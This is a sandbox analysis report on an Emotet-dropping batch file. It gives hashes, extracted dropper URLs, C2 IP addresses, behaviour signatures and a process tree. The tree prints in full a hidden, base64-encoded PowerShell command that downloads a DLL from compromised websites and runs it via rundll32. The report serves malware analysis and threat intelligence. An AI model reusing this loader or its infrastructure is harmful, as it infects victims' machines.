Resubmissions

27-01-2021 13:49

210127-jgxvn3zlme 10

27-01-2021 10:40

210127-e3sb2xn7kx 10

Analysis

  • max time kernel
    130s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    27-01-2021 10:40

General

  • Target

    test10.bat

  • Size

    5KB

  • MD5

    8f206a26531598cab414719c3c0ed6d1

  • SHA1

    eaaa6b68d56fca4149ad23492f025132fac4319e

  • SHA256

    a3d909dc41ff1fd0589df3b70b99579d4a6848a660048debf2ccacaea420bcd6

  • SHA512

    2d4dbc68c906a0be3ea6c5306e9ea3c127b7a7b8a9359a5366211a109a8868c91287189eda9b6cc66786d91d3ab4488e24ba8b4f86b49cc9b28f60809b31ef0c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://qingniatouzi.com/wp-includes/Z4TFME0/

exe.dropper

http://chenqiaorong007.com/wp-content/inh1Q4eFMT/

exe.dropper

http://bestcartdeal.com/wp-content/U12BbGPx2v/

exe.dropper

https://hredoybangladesh.com/3948708181/l7/

exe.dropper

https://washcolsc.com/wp-admin/gRIWZ/

exe.dropper

https://aqnym.top/wp-login/9ZvtYaLyhg/

Extracted

Family

emotet

Botnet

Epoch3

C2

132.248.38.158:80

203.157.152.9:7080

157.245.145.87:443

110.37.224.243:80

70.32.89.105:8080

185.142.236.163:443

192.241.220.183:8080

91.83.93.103:443

54.38.143.245:8080

192.210.217.94:8080

37.205.9.252:7080

78.90.78.210:80

182.73.7.59:8080

163.53.204.180:443

91.75.75.46:80

172.104.46.84:8080

161.49.84.2:80

27.78.27.110:443

203.160.167.243:80

109.99.146.210:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\test10.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -enc IABzAEUAVAAgACAAKAAnADcASQAnACsAJwAyAHEAVwAnACkAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsAMAB9AHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsANQB9ACIALQBGACAAJwBzAHkAcwBUACcALAAnAEUATQAuACcALAAnAGQAJwAsACcAaQBSAGUAJwAsACcASQBPAC4AJwAsACcAYwBUAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAUwBFAHQALQBJAFQAZQBtACAAIAB2AEEAUgBJAEEAYgBsAGUAOgA0ADUAeQBNAFcAcAAgACgAIAAgAFsAVAB5AFAAZQBdACgAIgB7ADQAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiAC0ARgAgACcAcwBFAHIAVgBpAEMAJwAsACcARQBSACcALAAnAEUAcABvAEkATgAnACwAJwBUAE0AYQBOAEEAZwAnACwAJwBTAHkAcwB0AEUATQAuAG4AZQBUACcALAAnAC4AJwApACAAKQA7ACAAIAAkAEgAdQA2AGMAZgB3ADIAPQAkAFkAOAA5AFIAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFUAOQA5AFoAOwAkAFgAMABfAFIAPQAoACcAWgAxACcAKwAnADQASQAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwARQAgACAAKAAnADcAaQAnACsAJwAyAHEAVwAnACkAIAAtAFYAYQBsACkAOgA6ACIAQwBSAEUAQQBgAFQARQBkAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB6ACcAKwAnAG0AOABEAGcAJwArACcAXwBqACcAKQArACgAJwBjADYAJwArACcAYQAnACkAKwAoACcAegBtADgAJwArACcATgAnACkAKwAoACcAZABxACcAKwAnAHgAdAAnACkAKwAoACcAaQAnACsAJwB1AHoAJwApACsAJwBtADgAJwApAC4AIgBSAGAARQBgAFAAbABhAGMARQAiACgAKAAnAHoAbQAnACsAJwA4ACcAKQAsAFsAcwB0AHIAaQBOAEcAXQBbAGMAaABBAFIAXQA5ADIAKQApACkAOwAkAEkAMwAwAFkAPQAoACcAWQAnACsAKAAnADYAJwArACcAXwBNACcAKQApADsAIAAgACQANAA1AFkATQBXAHAAOgA6ACIAUwBgAEUAQwBVAHIAaQBUAGAAeQBgAFAAcgBgAG8AdABvAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABTADEAXwBQAD0AKAAnAE0AMAAnACsAJwAyAEsAJwApADsAJABQADQAdwBzAGYAbQBxACAAPQAgACgAJwBLACcAKwAoACcAMwAnACsAJwA0AEoAJwApACkAOwAkAEUANAAwAEMAPQAoACcAUAAnACsAKAAnADMAMAAnACsAJwBQACcAKQApADsAJABTAGcAOQBoAG8ANQAyAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ARABnAF8AagAnACsAKAAnAGMAJwArACcANgBhACcAKQArACcAewAwAH0ATgBkACcAKwAoACcAcQAnACsAJwB4AHQAaQAnACkAKwAnAHUAJwArACcAewAwAH0AJwApACAAIAAtAGYAWwBDAEgAQQByAF0AOQAyACkAKwAkAFAANAB3AHMAZgBtAHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQAOQAwAEsAPQAoACgAJwBIADkAJwArACcANAAnACkAKwAnAEwAJwApADsAJABVAGoAZwBiAGMAOQBoAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAQgBrAGoAYgBxAGUAMQA9ACgAJwBzACcAKwAoACcAZwAgAHkAdwAgACcAKwAnAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAKAAnAC8AJwArACcAcQBpACcAKQArACcAbgBnACcAKwAoACcAbgBpACcAKwAnAGEAJwApACsAJwB0AG8AJwArACcAdQAnACsAKAAnAHoAaQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AJwApACsAJwBpACcAKwAoACcAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAvAFoANABUAEYATQBFADAALwAhAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIABhAGgAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGMAaABlACcAKwAnAG4AcQAnACkAKwAoACcAaQBhAG8AcgBvAG4AJwArACcAZwAwACcAKwAnADAAJwArACcANwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AJwArACcAdAAvAGkAbgAnACkAKwAoACcAaAAxAFEAJwArACcANABlACcAKQArACgAJwBGAE0AVAAnACsAJwAvACcAKQArACgAJwAhACcAKwAnAHMAZwAgACcAKwAnAHkAdwAgAGEAJwApACsAJwBoADoAJwArACgAJwAvAC8AYgAnACsAJwBlAHMAJwApACsAJwB0ACcAKwAnAGMAJwArACcAYQAnACsAKAAnAHIAJwArACcAdABkAGUAYQBsACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGMAJwArACgAJwBvAG4AdAAnACsAJwBlAG4AJwArACcAdAAvACcAKQArACgAJwBVADEAJwArACcAMgBCAGIAJwApACsAJwBHACcAKwAoACcAUAAnACsAJwB4ADIAdgAvACcAKwAnACEAcwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAJwArACcAaAAnACkAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAaAByACcAKwAnAGUAZAAnACkAKwAoACcAbwB5AGIAJwArACcAYQBuAGcAbAAnACkAKwAoACcAYQBkACcAKwAnAGUAcwAnACkAKwAnAGgALgAnACsAKAAnAGMAbwAnACsAJwBtAC8AMwAnACkAKwAoACcAOQA0ACcAKwAnADgANwAwACcAKQArACcAOAAxACcAKwAnADgAMQAnACsAJwAvACcAKwAoACcAbAA3AC8AIQBzACcAKwAnAGcAIAAnACsAJwB5ACcAKQArACgAJwB3ACAAYQBoAHMAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAHcAYQAnACkAKwAnAHMAJwArACcAaABjACcAKwAoACcAbwBsACcAKwAnAHMAYwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAnACkAKwAoACcALQBhAGQAbQBpACcAKwAnAG4ALwAnACsAJwBnACcAKQArACcAUgAnACsAKAAnAEkAVwBaACcAKwAnAC8AIQBzAGcAJwApACsAKAAnACAAJwArACcAeQB3ACAAYQBoAHMAOgAnACsAJwAvAC8AJwApACsAJwBhAHEAJwArACgAJwBuAHkAJwArACcAbQAuACcAKQArACgAJwB0AG8AcAAvACcAKwAnAHcAJwArACcAcAAtACcAKQArACgAJwBsACcAKwAnAG8AJwArACcAZwBpAG4ALwAnACkAKwAoACcAOQAnACsAJwBaAHYAdAAnACkAKwAoACcAWQAnACsAJwBhAEwAeQBoACcAKQArACcAZwAvACcAKQAuACIAUgBFAHAAbABgAEEAYABjAEUAIgAoACgAKAAnAHMAZwAgAHkAJwArACcAdwAnACkAKwAnACAAYQAnACsAJwBoACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVQBqAGcAYgBjADkAaAAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAGAAcABMAEkAdAAiACgAJABWADAANQBPACAAKwAgACQASAB1ADYAYwBmAHcAMgAgACsAIAAkAEUAXwAwAFoAKQA7ACQARABfADYAWgA9ACgAJwBRADgAJwArACcAMABBACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABvAHcAdQA4AGQANgAgAGkAbgAgACQAQgBrAGoAYgBxAGUAMQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAdABlAG0ALgBOAEUAdAAuAHcARQBiAEMATABJAGUAbgBUACkALgAiAEQAYABvAFcAbgBsAGAAbwBhAGQAZgBJAGwARQAiACgAJABQAG8AdwB1ADgAZAA2ACwAIAAkAFMAZwA5AGgAbwA1ADIAKQA7ACQATgAzADUAUgA9ACgAJwBSAF8AJwArACcAOABMACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAGcAOQBoAG8ANQAyACkALgAiAGwARQBgAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADEAMQA0ADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUwBnADkAaABvADUAMgAsACgAKAAnAEEAbgB5AFMAJwArACcAdAAnACkAKwAnAHIAJwArACgAJwBpAG4AJwArACcAZwAnACkAKQAuACIAdABgAE8AcwB0AHIAaQBuAGcAIgAoACkAOwAkAFcAMAA1AEMAPQAoACgAJwBYADQAJwArACcANwAnACkAKwAnAEgAJwApADsAYgByAGUAYQBrADsAJABIADAAMQBVAD0AKAAnAEkAMAAnACsAJwA1AEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADQANgBMAD0AKAAnAEwAOAAnACsAJwAzAFcAJwApAA==
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll AnyString
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll AnyString
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1564
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll",#1
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:428
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjnxgmltaqaofz\flujblalgdlcb.qjv",htMLCUwGEOPTYX
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:336
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjnxgmltaqaofz\flujblalgdlcb.qjv",#1
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:956

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
    MD5

    3e1249e4d0b0b61d493da93139b9f3a4

    SHA1

    82863b73820e293793dc90da9635c390fc928ef7

    SHA256

    03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

    SHA512

    4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

  • memory/316-13-0x0000000000000000-mapping.dmp
  • memory/336-29-0x0000000000000000-mapping.dmp
  • memory/428-21-0x0000000000000000-mapping.dmp
  • memory/680-39-0x000007FEF7140000-0x000007FEF73BA000-memory.dmp
    Filesize

    2.5MB

  • memory/956-33-0x0000000000000000-mapping.dmp
  • memory/1564-16-0x0000000076101000-0x0000000076103000-memory.dmp
    Filesize

    8KB

  • memory/1564-27-0x0000000000200000-0x000000000021F000-memory.dmp
    Filesize

    124KB

  • memory/1564-15-0x0000000000000000-mapping.dmp
  • memory/1564-28-0x0000000010000000-0x0000000010023000-memory.dmp
    Filesize

    140KB

  • memory/1988-11-0x000000001C4B0000-0x000000001C4B1000-memory.dmp
    Filesize

    4KB

  • memory/1988-10-0x00000000023E0000-0x00000000023E1000-memory.dmp
    Filesize

    4KB

  • memory/1988-9-0x0000000002530000-0x0000000002531000-memory.dmp
    Filesize

    4KB

  • memory/1988-8-0x000000001AD84000-0x000000001AD86000-memory.dmp
    Filesize

    8KB

  • memory/1988-7-0x000000001AD80000-0x000000001AD82000-memory.dmp
    Filesize

    8KB

  • memory/1988-6-0x000000001AE00000-0x000000001AE01000-memory.dmp
    Filesize

    4KB

  • memory/1988-2-0x0000000000000000-mapping.dmp
  • memory/1988-12-0x000000001AA90000-0x000000001AA91000-memory.dmp
    Filesize

    4KB

  • memory/1988-5-0x0000000002480000-0x0000000002481000-memory.dmp
    Filesize

    4KB

  • memory/1988-4-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp
    Filesize

    9.9MB

  • memory/1988-3-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp
    Filesize

    8KB